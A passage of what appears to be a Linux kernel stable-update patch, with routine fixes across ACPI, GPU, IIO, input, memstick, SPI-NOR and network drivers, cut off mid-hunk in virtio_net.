++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/drivers/acpi/acpica/evevent.c b/drivers/acpi/acpica/evevent.c
+index 82d1728b9bc6a..df596d46dd974 100644
+--- a/drivers/acpi/acpica/evevent.c
++++ b/drivers/acpi/acpica/evevent.c
+@@ -142,9 +142,6 @@ static acpi_status acpi_ev_fixed_event_initialize(void)
+ 			status =
+ 			    acpi_write_bit_register(acpi_gbl_fixed_event_info
+ 						    [i].enable_register_id,
+-						    (i ==
+-						     ACPI_EVENT_PCIE_WAKE) ?
+-						    ACPI_ENABLE_EVENT :
+ 						    ACPI_DISABLE_EVENT);
+ 			if (ACPI_FAILURE(status)) {
+ 				return (status);
+@@ -188,11 +185,6 @@ u32 acpi_ev_fixed_event_detect(void)
+ 		return (int_status);
+ 	}
+ 
+-	if (fixed_enable & ACPI_BITMASK_PCIEXP_WAKE_DISABLE)
+-		fixed_enable &= ~ACPI_BITMASK_PCIEXP_WAKE_DISABLE;
+-	else
+-		fixed_enable |= ACPI_BITMASK_PCIEXP_WAKE_DISABLE;
+-
+ 	ACPI_DEBUG_PRINT((ACPI_DB_INTERRUPTS,
+ 			  "Fixed Event Block: Enable %08X Status %08X\n",
+ 			  fixed_enable, fixed_status));
+@@ -258,9 +250,6 @@ static u32 acpi_ev_fixed_event_dispatch(u32 event)
+ 	if (!acpi_gbl_fixed_event_handlers[event].handler) {
+ 		(void)acpi_write_bit_register(acpi_gbl_fixed_event_info[event].
+ 					      enable_register_id,
+-					      (event ==
+-					       ACPI_EVENT_PCIE_WAKE) ?
+-					      ACPI_ENABLE_EVENT :
+ 					      ACPI_DISABLE_EVENT);
+ 
+ 		ACPI_ERROR((AE_INFO,
+diff --git a/drivers/acpi/acpica/hwsleep.c b/drivers/acpi/acpica/hwsleep.c
+index 37b3f641feaab..bd936476dda96 100644
+--- a/drivers/acpi/acpica/hwsleep.c
++++ b/drivers/acpi/acpica/hwsleep.c
+@@ -311,20 +311,6 @@ acpi_status acpi_hw_legacy_wake(u8 sleep_state)
+ 				    [ACPI_EVENT_SLEEP_BUTTON].
+ 				    status_register_id, ACPI_CLEAR_STATUS);
+ 
+-	/* Enable pcie wake event if support */
+-	if ((acpi_gbl_FADT.flags & ACPI_FADT_PCI_EXPRESS_WAKE)) {
+-		(void)
+-		    acpi_write_bit_register(acpi_gbl_fixed_event_info
+-					    [ACPI_EVENT_PCIE_WAKE].
+-					    enable_register_id,
+-					    ACPI_DISABLE_EVENT);
+-		(void)
+-		    acpi_write_bit_register(acpi_gbl_fixed_event_info
+-					    [ACPI_EVENT_PCIE_WAKE].
+-					    status_register_id,
+-					    ACPI_CLEAR_STATUS);
+-	}
+-
+ 	acpi_hw_execute_sleep_method(METHOD_PATHNAME__SST, ACPI_SST_WORKING);
+ 	return_ACPI_STATUS(status);
+ }
+diff --git a/drivers/acpi/acpica/utglobal.c b/drivers/acpi/acpica/utglobal.c
+index 53afa5edb6ecb..cda6e16dddf78 100644
+--- a/drivers/acpi/acpica/utglobal.c
++++ b/drivers/acpi/acpica/utglobal.c
+@@ -186,10 +186,6 @@ struct acpi_fixed_event_info acpi_gbl_fixed_event_info[ACPI_NUM_FIXED_EVENTS] =
+ 					ACPI_BITREG_RT_CLOCK_ENABLE,
+ 					ACPI_BITMASK_RT_CLOCK_STATUS,
+ 					ACPI_BITMASK_RT_CLOCK_ENABLE},
+-	/* ACPI_EVENT_PCIE_WAKE     */ {ACPI_BITREG_PCIEXP_WAKE_STATUS,
+-					ACPI_BITREG_PCIEXP_WAKE_DISABLE,
+-					ACPI_BITMASK_PCIEXP_WAKE_STATUS,
+-					ACPI_BITMASK_PCIEXP_WAKE_DISABLE},
+ };
+ #endif				/* !ACPI_REDUCED_HARDWARE */
+ 
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 727704431f618..13918c8c839ea 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -360,7 +360,6 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 	bridge->dev.parent = parent;
+ 	bridge->dev.of_node = parent->of_node;
+ 	bridge->dev.id = id;
+-	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
+ 
+ 	ret = dev_set_name(&bridge->dev, "br%d", id);
+ 	if (ret)
+@@ -372,6 +371,8 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
++
+ 	return bridge;
+ 
+ error_device:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index a6aef488a8228..c8413470e057f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -597,6 +597,9 @@ int amdgpu_irq_put(struct amdgpu_device *adev, struct amdgpu_irq_src *src,
+ 	if (!src->enabled_types || !src->funcs->set)
+ 		return -EINVAL;
+ 
++	if (WARN_ON(!amdgpu_irq_enabled(adev, src, type)))
++		return -EINVAL;
++
+ 	if (atomic_dec_and_test(&src->enabled_types[type]))
+ 		return amdgpu_irq_update(adev, src, type);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 78c2ed59e87d2..ad8fac86dc70a 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -170,10 +170,21 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (rc)
+ 		return rc;
+ 
+-	irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++	if (amdgpu_in_reset(adev)) {
++		irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++		/* During gpu-reset we disable and then enable vblank irq, so
++		 * don't use amdgpu_irq_get/put() to avoid refcount change.
++		 */
++		if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
++			rc = -EBUSY;
++	} else {
++		rc = (enable)
++			? amdgpu_irq_get(adev, &adev->crtc_irq, acrtc->crtc_id)
++			: amdgpu_irq_put(adev, &adev->crtc_irq, acrtc->crtc_id);
++	}
+ 
+-	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+-		return -EBUSY;
++	if (rc)
++		return rc;
+ 
+ skip:
+ 	if (amdgpu_in_reset(adev))
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index b37d14369a622..59836570603ac 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -222,7 +222,7 @@ struct _vcs_dpi_ip_params_st dcn3_15_ip = {
+ 	.maximum_dsc_bits_per_component = 10,
+ 	.dsc422_native_support = false,
+ 	.is_line_buffer_bpp_fixed = true,
+-	.line_buffer_fixed_bpp = 49,
++	.line_buffer_fixed_bpp = 48,
+ 	.line_buffer_size_bits = 789504,
+ 	.max_line_buffer_lines = 12,
+ 	.writeback_interface_buffer_size_kbytes = 90,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 3d1f50f481cfd..7098f125b54a9 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -146,8 +146,8 @@ int drm_buddy_init(struct drm_buddy *mm, u64 size, u64 chunk_size)
+ 		unsigned int order;
+ 		u64 root_size;
+ 
+-		root_size = rounddown_pow_of_two(size);
+-		order = ilog2(root_size) - ilog2(chunk_size);
++		order = ilog2(size) - ilog2(chunk_size);
++		root_size = chunk_size << order;
+ 
+ 		root = drm_block_alloc(mm, NULL, order, offset);
+ 		if (!root)
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 664bebdecea76..d5fed2eb66d2b 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -166,7 +166,7 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(32) |
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+ 	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 8cecf81a5ae03..3c05ce01f73b8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -840,6 +840,8 @@ static void vop2_enable(struct vop2 *vop2)
+ 		return;
+ 	}
+ 
++	regcache_sync(vop2->map);
++
+ 	if (vop2->data->soc_id == 3566)
+ 		vop2_writel(vop2, RK3568_OTP_WIN_EN, 1);
+ 
+@@ -868,6 +870,8 @@ static void vop2_disable(struct vop2 *vop2)
+ 
+ 	pm_runtime_put_sync(vop2->dev);
+ 
++	regcache_mark_dirty(vop2->map);
++
+ 	clk_disable_unprepare(vop2->aclk);
+ 	clk_disable_unprepare(vop2->hclk);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_buddy_test.c b/drivers/gpu/drm/tests/drm_buddy_test.c
+index f8ee714df3967..09ee6f6af896b 100644
+--- a/drivers/gpu/drm/tests/drm_buddy_test.c
++++ b/drivers/gpu/drm/tests/drm_buddy_test.c
+@@ -89,7 +89,8 @@ static int check_block(struct kunit *test, struct drm_buddy *mm,
+ 		err = -EINVAL;
+ 	}
+ 
+-	if (!is_power_of_2(block_size)) {
++	/* We can't use is_power_of_2() for a u64 on 32-bit systems. */
++	if (block_size & (block_size - 1)) {
+ 		kunit_err(test, "block size not power of two\n");
+ 		err = -EINVAL;
+ 	}
+diff --git a/drivers/iio/adc/at91-sama5d2_adc.c b/drivers/iio/adc/at91-sama5d2_adc.c
+index ed4f8501bda84..ed4961c29d5f4 100644
+--- a/drivers/iio/adc/at91-sama5d2_adc.c
++++ b/drivers/iio/adc/at91-sama5d2_adc.c
+@@ -1409,7 +1409,7 @@ static struct iio_trigger *at91_adc_allocate_trigger(struct iio_dev *indio,
+ 	trig = devm_iio_trigger_alloc(&indio->dev, "%s-dev%d-%s", indio->name,
+ 				iio_device_id(indio), trigger_name);
+ 	if (!trig)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	trig->dev.parent = indio->dev.parent;
+ 	iio_trigger_set_drvdata(trig, indio);
+diff --git a/drivers/iio/dac/ad5755.c b/drivers/iio/dac/ad5755.c
+index beadfa938d2da..404865e354602 100644
+--- a/drivers/iio/dac/ad5755.c
++++ b/drivers/iio/dac/ad5755.c
+@@ -802,6 +802,7 @@ static struct ad5755_platform_data *ad5755_parse_fw(struct device *dev)
+ 	return pdata;
+ 
+  error_out:
++	fwnode_handle_put(pp);
+ 	devm_kfree(dev, pdata);
+ 	return NULL;
+ }
+diff --git a/drivers/iio/light/tsl2772.c b/drivers/iio/light/tsl2772.c
+index ad50baa0202cc..e823c145f6792 100644
+--- a/drivers/iio/light/tsl2772.c
++++ b/drivers/iio/light/tsl2772.c
+@@ -601,6 +601,7 @@ static int tsl2772_read_prox_diodes(struct tsl2772_chip *chip)
+ 			return -EINVAL;
+ 		}
+ 	}
++	chip->settings.prox_diode = prox_diode_mask;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/tablet/pegasus_notetaker.c b/drivers/input/tablet/pegasus_notetaker.c
+index d836d3dcc6a24..a68da2988f9cd 100644
+--- a/drivers/input/tablet/pegasus_notetaker.c
++++ b/drivers/input/tablet/pegasus_notetaker.c
+@@ -296,6 +296,12 @@ static int pegasus_probe(struct usb_interface *intf,
+ 	pegasus->intf = intf;
+ 
+ 	pipe = usb_rcvintpipe(dev, endpoint->bEndpointAddress);
++	/* Sanity check that pipe's type matches endpoint's type */
++	if (usb_pipe_type_check(dev, pipe)) {
++		error = -EINVAL;
++		goto err_free_mem;
++	}
++
+ 	pegasus->data_len = usb_maxpacket(dev, pipe);
+ 
+ 	pegasus->data = usb_alloc_coherent(dev, pegasus->data_len, GFP_KERNEL,
+diff --git a/drivers/input/touchscreen/cyttsp5.c b/drivers/input/touchscreen/cyttsp5.c
+index 4a23d62313825..434a37317cbe5 100644
+--- a/drivers/input/touchscreen/cyttsp5.c
++++ b/drivers/input/touchscreen/cyttsp5.c
+@@ -111,6 +111,7 @@ struct cyttsp5_sensing_conf_data_dev {
+ 	__le16 max_z;
+ 	u8 origin_x;
+ 	u8 origin_y;
++	u8 panel_id;
+ 	u8 btn;
+ 	u8 scan_mode;
+ 	u8 max_num_of_tch_per_refresh_cycle;
+diff --git a/drivers/memstick/core/memstick.c b/drivers/memstick/core/memstick.c
+index 660df7d269fac..d410e2e78a3d3 100644
+--- a/drivers/memstick/core/memstick.c
++++ b/drivers/memstick/core/memstick.c
+@@ -410,6 +410,7 @@ static struct memstick_dev *memstick_alloc_card(struct memstick_host *host)
+ 	return card;
+ err_out:
+ 	host->card = old_card;
++	kfree_const(card->dev.kobj.name);
+ 	kfree(card);
+ 	return NULL;
+ }
+@@ -468,8 +469,10 @@ static void memstick_check(struct work_struct *work)
+ 				put_device(&card->dev);
+ 				host->card = NULL;
+ 			}
+-		} else
++		} else {
++			kfree_const(card->dev.kobj.name);
+ 			kfree(card);
++		}
+ 	}
+ 
+ out_power_off:
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 89953093e20c7..672d37ea98d0f 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -351,8 +351,6 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 		 */
+ 		case MMC_TIMING_SD_HS:
+ 		case MMC_TIMING_MMC_HS:
+-		case MMC_TIMING_UHS_SDR12:
+-		case MMC_TIMING_UHS_SDR25:
+ 			val &= ~SDHCI_CTRL_HISPD;
+ 		}
+ 	}
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 2ef2660f58180..4244c6fd98111 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -3344,7 +3344,19 @@ static struct spi_mem_driver spi_nor_driver = {
+ 	.remove = spi_nor_remove,
+ 	.shutdown = spi_nor_shutdown,
+ };
+-module_spi_mem_driver(spi_nor_driver);
++
++static int __init spi_nor_module_init(void)
++{
++	return spi_mem_driver_register(&spi_nor_driver);
++}
++module_init(spi_nor_module_init);
++
++static void __exit spi_nor_module_exit(void)
++{
++	spi_mem_driver_unregister(&spi_nor_driver);
++	spi_nor_debugfs_shutdown();
++}
++module_exit(spi_nor_module_exit);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Huang Shijie <shijie8@gmail.com>");
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 958cd143c9346..f4246c52a1def 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -714,8 +714,10 @@ static inline struct spi_nor *mtd_to_spi_nor(struct mtd_info *mtd)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ void spi_nor_debugfs_register(struct spi_nor *nor);
++void spi_nor_debugfs_shutdown(void);
+ #else
+ static inline void spi_nor_debugfs_register(struct spi_nor *nor) {}
++static inline void spi_nor_debugfs_shutdown(void) {}
+ #endif
+ 
+ #endif /* __LINUX_MTD_SPI_NOR_INTERNAL_H */
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index ff895f6758ea1..558ffecf8ae6d 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -226,13 +226,13 @@ static void spi_nor_debugfs_unregister(void *data)
+ 	nor->debugfs_root = NULL;
+ }
+ 
++static struct dentry *rootdir;
++
+ void spi_nor_debugfs_register(struct spi_nor *nor)
+ {
+-	struct dentry *rootdir, *d;
++	struct dentry *d;
+ 	int ret;
+ 
+-	/* Create rootdir once. Will never be deleted again. */
+-	rootdir = debugfs_lookup(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 	if (!rootdir)
+ 		rootdir = debugfs_create_dir(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 
+@@ -247,3 +247,8 @@ void spi_nor_debugfs_register(struct spi_nor *nor)
+ 	debugfs_create_file("capabilities", 0444, d, nor,
+ 			    &spi_nor_capabilities_fops);
+ }
++
++void spi_nor_debugfs_shutdown(void)
++{
++	debugfs_remove(rootdir);
++}
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 415cd95fb140f..ddbf892e9b9ce 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1775,14 +1775,15 @@ void bond_lower_state_changed(struct slave *slave)
+ 
+ /* The bonding driver uses ether_setup() to convert a master bond device
+  * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
+- * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE and IFF_UP
++ * if they were set
+  */
+ static void bond_ether_setup(struct net_device *bond_dev)
+ {
+-	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++	unsigned int flags = bond_dev->flags & (IFF_SLAVE | IFF_UP);
+ 
+ 	ether_setup(bond_dev);
+-	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->flags |= IFF_MASTER | flags;
+ 	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+ }
+ 
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index 70887e0aece33..d9434ed9450df 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -216,6 +216,18 @@ static int b53_mmap_write64(struct b53_device *dev, u8 page, u8 reg,
+ 	return 0;
+ }
+ 
++static int b53_mmap_phy_read16(struct b53_device *dev, int addr, int reg,
++			       u16 *value)
++{
++	return -EIO;
++}
++
++static int b53_mmap_phy_write16(struct b53_device *dev, int addr, int reg,
++				u16 value)
++{
++	return -EIO;
++}
++
+ static const struct b53_io_ops b53_mmap_ops = {
+ 	.read8 = b53_mmap_read8,
+ 	.read16 = b53_mmap_read16,
+@@ -227,6 +239,8 @@ static const struct b53_io_ops b53_mmap_ops = {
+ 	.write32 = b53_mmap_write32,
+ 	.write48 = b53_mmap_write48,
+ 	.write64 = b53_mmap_write64,
++	.phy_read16 = b53_mmap_phy_read16,
++	.phy_write16 = b53_mmap_phy_write16,
+ };
+ 
+ static int b53_mmap_probe_of(struct platform_device *pdev,
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 3fffd5da8d3b0..ffcad057d0650 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -96,7 +96,7 @@ static int ksz8795_change_mtu(struct ksz_device *dev, int frame_size)
+ 
+ 	if (frame_size > KSZ8_LEGAL_PACKET_SIZE)
+ 		ctrl2 |= SW_LEGAL_PACKET_DISABLE;
+-	else if (frame_size > KSZ8863_NORMAL_PACKET_SIZE)
++	if (frame_size > KSZ8863_NORMAL_PACKET_SIZE)
+ 		ctrl1 |= SW_HUGE_PACKET;
+ 
+ 	ret = ksz_rmw8(dev, REG_SW_CTRL_1, SW_HUGE_PACKET, ctrl1);
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 015b5848b9583..47617a95034c6 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2388,7 +2388,7 @@ static int bnxt_async_event_process(struct bnxt *bp,
+ 	case ASYNC_EVENT_CMPL_EVENT_ID_PHC_UPDATE: {
+ 		switch (BNXT_EVENT_PHC_EVENT_TYPE(data1)) {
+ 		case ASYNC_EVENT_CMPL_PHC_UPDATE_EVENT_DATA1_FLAGS_PHC_RTC_UPDATE:
+-			if (bp->fw_cap & BNXT_FW_CAP_PTP_RTC) {
++			if (BNXT_PTP_USE_RTC(bp)) {
+ 				struct bnxt_ptp_cfg *ptp = bp->ptp_cfg;
+ 				u64 ns;
+ 
+@@ -7628,7 +7628,7 @@ static int __bnxt_hwrm_ptp_qcfg(struct bnxt *bp)
+ 	u8 flags;
+ 	int rc;
+ 
+-	if (bp->hwrm_spec_code < 0x10801) {
++	if (bp->hwrm_spec_code < 0x10801 || !BNXT_CHIP_P5_THOR(bp)) {
+ 		rc = -ENODEV;
+ 		goto no_ptp;
+ 	}
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
+index dd9be229819a5..d3541159487dd 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_tc_flower.c
+@@ -1135,7 +1135,7 @@ void cxgb4_cleanup_tc_flower(struct adapter *adap)
+ 		return;
+ 
+ 	if (adap->flower_stats_timer.function)
+-		del_timer_sync(&adap->flower_stats_timer);
++		timer_shutdown_sync(&adap->flower_stats_timer);
+ 	cancel_work_sync(&adap->flower_stats_work);
+ 	rhashtable_destroy(&adap->flower_tbl);
+ 	adap->tc_flower_initialized = false;
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index 04acd1a992fa2..2146e7a137244 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -5288,31 +5288,6 @@ static void e1000_watchdog_task(struct work_struct *work)
+ 				ew32(TARC(0), tarc0);
+ 			}
+ 
+-			/* disable TSO for pcie and 10/100 speeds, to avoid
+-			 * some hardware issues
+-			 */
+-			if (!(adapter->flags & FLAG_TSO_FORCE)) {
+-				switch (adapter->link_speed) {
+-				case SPEED_10:
+-				case SPEED_100:
+-					e_info("10/100 speed: disabling TSO\n");
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-					break;
+-				case SPEED_1000:
+-					netdev->features |= NETIF_F_TSO;
+-					netdev->features |= NETIF_F_TSO6;
+-					break;
+-				default:
+-					/* oops */
+-					break;
+-				}
+-				if (hw->mac.type == e1000_pch_spt) {
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-				}
+-			}
+-
+ 			/* enable transmits in the hardware, need to do this
+ 			 * after setting TARC(0)
+ 			 */
+@@ -7529,6 +7504,32 @@ static int e1000_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    NETIF_F_RXCSUM |
+ 			    NETIF_F_HW_CSUM);
+ 
++	/* disable TSO for pcie and 10/100 speeds to avoid
++	 * some hardware issues and for i219 to fix transfer
++	 * speed being capped at 60%
++	 */
++	if (!(adapter->flags & FLAG_TSO_FORCE)) {
++		switch (adapter->link_speed) {
++		case SPEED_10:
++		case SPEED_100:
++			e_info("10/100 speed: disabling TSO\n");
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++			break;
++		case SPEED_1000:
++			netdev->features |= NETIF_F_TSO;
++			netdev->features |= NETIF_F_TSO6;
++			break;
++		default:
++			/* oops */
++			break;
++		}
++		if (hw->mac.type == e1000_pch_spt) {
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++		}
++	}
++
+ 	/* Set user-changeable features (subset of all device features) */
+ 	netdev->hw_features = netdev->features;
+ 	netdev->hw_features |= NETIF_F_RXFCS;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 8328139db3795..3ac7234a85bbb 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -11059,8 +11059,11 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+ 	/* reinit the misc interrupt */
+-	if (pf->flags & I40E_FLAG_MSIX_ENABLED)
++	if (pf->flags & I40E_FLAG_MSIX_ENABLED) {
+ 		ret = i40e_setup_misc_vector(pf);
++		if (ret)
++			goto end_unlock;
++	}
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -14125,15 +14128,15 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		vsi->id = ctxt.vsi_number;
+ 	}
+ 
+-	vsi->active_filters = 0;
+-	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
++	vsi->active_filters = 0;
+ 	/* If macvlan filters already exist, force them to get loaded */
+ 	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
+ 		f->state = I40E_FILTER_NEW;
+ 		f_count++;
+ 	}
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
++	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 
+ 	if (f_count) {
+ 		vsi->flags |= I40E_VSI_FLAG_FILTER_CHANGED;
+diff --git a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+index 017d68f1e1232..972c571b41587 100644
+--- a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
++++ b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+@@ -31,6 +31,8 @@ mlxfw_mfa2_tlv_next(const struct mlxfw_mfa2_file *mfa2_file,
+ 
+ 	if (tlv->type == MLXFW_MFA2_TLV_MULTI_PART) {
+ 		multi = mlxfw_mfa2_tlv_multi_get(mfa2_file, tlv);
++		if (!multi)
++			return NULL;
+ 		tlv_len = NLA_ALIGN(tlv_len + be16_to_cpu(multi->total_len));
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+index 48dbfea0a2a1d..7cdf0ce24f288 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+@@ -26,7 +26,7 @@
+ #define MLXSW_PCI_CIR_TIMEOUT_MSECS		1000
+ 
+ #define MLXSW_PCI_SW_RESET_TIMEOUT_MSECS	900000
+-#define MLXSW_PCI_SW_RESET_WAIT_MSECS		200
++#define MLXSW_PCI_SW_RESET_WAIT_MSECS		400
+ #define MLXSW_PCI_FW_READY			0xA1844
+ #define MLXSW_PCI_FW_READY_MASK			0xFFFF
+ #define MLXSW_PCI_FW_READY_MAGIC		0x5E
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 6a1bff54bc6c3..e6aedd8ebd750 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -541,7 +541,6 @@ int efx_net_open(struct net_device *net_dev)
+ 	else
+ 		efx->state = STATE_NET_UP;
+ 
+-	efx_selftest_async_start(efx);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/sfc/efx_common.c b/drivers/net/ethernet/sfc/efx_common.c
+index cc30524c2fe45..361687de308dc 100644
+--- a/drivers/net/ethernet/sfc/efx_common.c
++++ b/drivers/net/ethernet/sfc/efx_common.c
+@@ -544,6 +544,8 @@ void efx_start_all(struct efx_nic *efx)
+ 	/* Start the hardware monitor if there is one */
+ 	efx_start_monitor(efx);
+ 
++	efx_selftest_async_start(efx);
++
+ 	/* Link state detection is normally event-driven; we have
+ 	 * to poll now because we could have missed a change
+ 	 */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 61e33e4dd0cd6..0644069592211 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -728,8 +728,13 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 				       int page_off,
+ 				       unsigned int *len)
+ {
+-	struct page *page = alloc_page(GFP_ATOMIC);
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	struct page *page;
+ 
